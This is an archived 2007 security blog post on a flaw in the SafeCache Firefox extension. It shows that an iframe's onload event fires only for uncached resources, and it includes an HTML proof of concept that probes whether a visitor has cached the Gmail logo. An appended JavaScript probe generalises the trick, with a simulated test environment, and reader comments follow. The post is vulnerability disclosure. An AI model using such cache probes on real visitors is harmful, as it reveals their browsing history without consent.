Saturday, February 10, 2007

Attacking the SafeCache Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, and troopa is now using the domain for his blog, so I'm moving all my content here:

The SafeCache extension is yet another good idea in browser security to come out of Stanford University. Essentially, it extends the browser's same-origin policy to the browser cache in order to defend against cache timing attacks (where a page measures how quickly a cross-site resource loads to infer whether the victim has already visited that site). You can find more info about it here: http://www.safecache.com/

Now, while I have not looked at the source code of the extension, I have devised a method that allows not only timing attacks, but directly determining whether or not the objects you want information about are in the cache.

It seems that if you create an iframe element whose src attribute points to the resource whose cache state you want to query, the onload event fires only if the item is not in any cache.

To test this, either log in to Gmail or visit http://mail.google.com/mail/help/images/logo.gif (so that the logo is cached), and then create a page like the following:

<html>
<body>
<script>
// Fires only when the iframe's resource was actually fetched, i.e. was not cached.
function loaded() {
  var t2 = new Date().getTime();
  alert(t2 - t1);   // milliseconds from page start to onload
}

// Record when the page started running, before the iframe is created.
var time = new Date();
var t1 = time.getTime();
</script>
<!-- The probed resource: the Gmail logo, cached once you have viewed it or Gmail. -->
<iframe src="http://mail.google.com/mail/help/images/logo.gif" onload="loaded()">
</iframe>
</body>
</html>



You will notice that the onload event does not fire, so no alert appears. If you then press Ctrl+Shift+Del, clear the cache and visit the HTML page you just created again, the onload event fires and the alert shows the load time.

If you refresh the page, the onload event will not fire a second time, because the image is now back in the cache.

So while SafeCache stops standard cache timing attacks, it does not stop attacks against its own behaviour: whether or not onload fires reveals the cache state of a cross-site resource directly, with no timing measurement needed at all.
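As an added example (not code from the original post or from the SafeCache project), here is a more general probe that wraps the iframe trick described above in a function: it reports 'uncached' when onload fires before a deadline and 'cached' when it never does, and records the elapsed time as well, so one call gives both the presence channel and the timing channel. The DOM and timer APIs are injected, so the probe can run offline against a constructed fake environment that simulates the Firefox + SafeCache behaviour the post reports; probeCacheState, makeFakeEnv, simulateProbe, the 1000 ms deadline and the simulated 120 ms fetch time are all assumptions of this example. Note that current browsers fire the iframe load event whether or not the resource came from cache, so in a modern browser the classifier reports 'uncached' for everything; it relies on the behaviour the post describes for the Firefox/SafeCache combination of the time.

```javascript
'use strict';

// Generalised cache-state probe built on the behaviour described in the post:
// an <iframe> whose src is the target resource fires onload only when the
// resource is NOT already cached. DOM and timer APIs come in through `env`
// so the same function runs in a browser and, with fakes, offline.
//
// env = {
//   doc:    { createElement(tag), body: { appendChild(el), removeChild(el) } },
//   timers: { setTimeout(fn, ms), clearTimeout(id), now() },
// }
function probeCacheState(url, timeoutMs, env, callback) {
  const { doc, timers } = env;
  const frame = doc.createElement('iframe');
  const started = timers.now();
  let settled = false;

  function finish(state) {
    if (settled) return;              // ignore a late onload after the deadline
    settled = true;
    timers.clearTimeout(timer);
    doc.body.removeChild(frame);      // clean up the probe frame
    callback({ url, state, elapsedMs: timers.now() - started });
  }

  // No onload before the deadline: per the post, the resource was cached.
  const timer = timers.setTimeout(() => finish('cached'), timeoutMs);
  // onload fired: the resource was fetched, i.e. it was not in the cache.
  frame.onload = () => finish('uncached');
  frame.src = url;
  doc.body.appendChild(frame);
}

// Constructed fake DOM/timer environment (assumption, for offline runs). It
// simulates the reported behaviour: appendChild fires onload after a
// simulated 120 ms fetch for uncached URLs and never for cached ones.
function makeFakeEnv(cachedUrls) {
  const pending = [];                 // queued timeouts, fired by advanceTimers()
  let clock = 0;
  let nextId = 1;
  const body = {
    children: [],
    appendChild(el) {
      this.children.push(el);
      if (!cachedUrls.has(el.src)) { clock += 120; el.onload(); }
    },
    removeChild(el) { this.children = this.children.filter((c) => c !== el); },
  };
  return {
    doc: { createElement: (tag) => ({ tagName: tag.toUpperCase() }), body },
    timers: {
      setTimeout(fn, ms) { const id = nextId++; pending.push({ id, fn, ms }); return id; },
      clearTimeout(id) {
        const i = pending.findIndex((t) => t.id === id);
        if (i >= 0) pending.splice(i, 1);
      },
      now: () => clock,
    },
    // Fire every queued timeout in order, advancing the simulated clock.
    advanceTimers() { while (pending.length) { const t = pending.shift(); clock += t.ms; t.fn(); } },
  };
}

// Run one probe against the fake environment and return its result synchronously.
function simulateProbe(url, cachedUrls) {
  const env = makeFakeEnv(cachedUrls);
  let result = null;
  probeCacheState(url, 1000, env, (r) => { result = r; });
  env.advanceTimers();                // let the deadline expire if onload never came
  return result;
}

// In a real browser, wire the probe to the actual DOM and timers. The arrow
// wrappers keep window's `this` for setTimeout/clearTimeout.
if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  probeCacheState('http://mail.google.com/mail/help/images/logo.gif', 2000, {
    doc: document,
    timers: {
      setTimeout: (fn, ms) => window.setTimeout(fn, ms),
      clearTimeout: (id) => window.clearTimeout(id),
      now: () => new Date().getTime(),
    },
  }, (r) => console.log(r.url, r.state, r.elapsedMs + ' ms'));
}

module.exports = { probeCacheState, makeFakeEnv, simulateProbe };
```

The deadline is the one design choice that matters: it has to be longer than the slowest genuine fetch you expect, otherwise a slow uncached load is misclassified as cached. In the fake environment the simulated fetch is 120 ms against a 1000 ms deadline, so the two cases are cleanly separated.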

2 comments:

Anonymous said...

Sorry to say that I did not get the point that you mentioned about SafeCache, that "it prevents standard timing attacks on cache but can't protect itself".

I'm sorry if that is obvious from the example that you have given here, but please elaborate.

kuza55 said...

Well, at this stage I don't know if what I was talking about has been patched (because the extension has been patched for something), or if I simply put out a half-baked piece of research that wasn't accurate. Obviously I think it was patched, but you never know, and I can't find the old versions anywhere.

Anyway, the point of the SafeCache extension is to prevent timing attacks against the browser cache.

My point was that while it does that effectively, it missed a spot where attacks against the SafeCache extension itself (i.e. like the one I described in this post) can still extract the same information, and in some cases, such as this one, in a much more accurate fashion.